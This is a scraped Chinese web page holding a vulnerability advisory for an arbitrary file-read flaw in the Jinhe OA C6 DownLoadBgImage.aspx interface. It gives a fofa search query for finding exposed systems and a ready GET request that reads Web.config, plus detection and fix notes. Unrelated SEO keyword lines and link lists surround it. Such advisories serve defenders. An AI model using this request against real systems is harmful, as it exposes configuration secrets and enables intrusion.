当前位置: 首页 > news >正文

安徽建设厅网站打不开现在广告行业好做吗

安徽建设厅网站打不开,现在广告行业好做吗,什么是网站运营推广,Wordpress插件完全删除金和OA C6 DownLoadBgImage任意文件读取漏洞 漏洞描述 金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统,主要应用于企业资源规划(ERP)、客户关系管理(CRM)以及办公自动化(OA&#xff09…

金和OA C6 DownLoadBgImage任意文件读取漏洞

漏洞描述

金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统,主要应用于企业资源规划(ERP)、客户关系管理(CRM)以及办公自动化(OA)等领域。金和OA C6 接口JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx 其参数path存在文件遍历漏洞可读取系统任意文件,造成信息泄露。

威胁等级: 高危

漏洞分类: 信息泄露

涉及厂商及产品:金和C6

应用指纹及检出思路

此用存在二次开发的可能性,接口存在JHSoft 关键词可大致判断

fofa:body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"

漏洞复现

GET /C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/?path=/C6/Web.config HTTP/1.1 Host:

检测思路

检测web.config关键字段即可。如 等。

修复建议

设置访问控制策略,禁用此接口

http://www.yayakq.cn/news/58183/

相关文章:

  • 网站专业技能培训机构西安模板建站定制
  • 成都网上商城网站建设网站分哪些类型
  • 网站设计哪家更好wordpress评论积分
  • 最传统的网站推广手段大型网站如何优化
  • 做网站前的准备工作招标网站建设
  • 鞍山网站哪家好韶关网站建设科技有限公司
  • 做视频网站注意什么如何做微信小程序?
  • 站长工具无吗经典马鞍山做公司网站的
  • 外国人做中国英语视频网站上海专业的网站建
  • 佛山制作网站企业网站开发图书管理系统报告摘要
  • 基于ssh架构网站开发大学生个人简历word模板免费下载
  • 进网站后台加什么原因免费的ppt模板软件
  • 新商盟网站开发时间军事新闻最新消息视频
  • 石家庄网站排名南京商城网站建设
  • 网站转移 备案台州网站建设兼职
  • 网站建设推广优化公司seo公司 引擎
  • 西安市网站网络科技公司起名大全参考
  • 制作团购网站揭阳seo快速排名
  • 自媒体多平台发布工具东莞网站建设seo
  • 做网站个人怎么签合同广告联盟上怎么做网站
  • 营销型网站建设找哪家密云郑州阳网站建设
  • 哈尔滨网站搜索优化wordpress 底部导航
  • 厦门企业做网站网站服务器租用 价格
  • 网站制作把图片做背景四川煤矿标准化建设网站
  • 网站上的vR场景贴图怎么做的湖南长沙理工大学
  • 学网站开发和游戏开发那个wordpress 小熊资源网
  • 描述建设一个网站的具体流程数据库网站开发外文翻译
  • 免费网站建设哪个好 - 百度网站建设平台哪个公司好
  • 我的网站模板下载不了wordpress 分类数量
  • 界面设计优秀的网站有哪些华为手机网站建设策划方案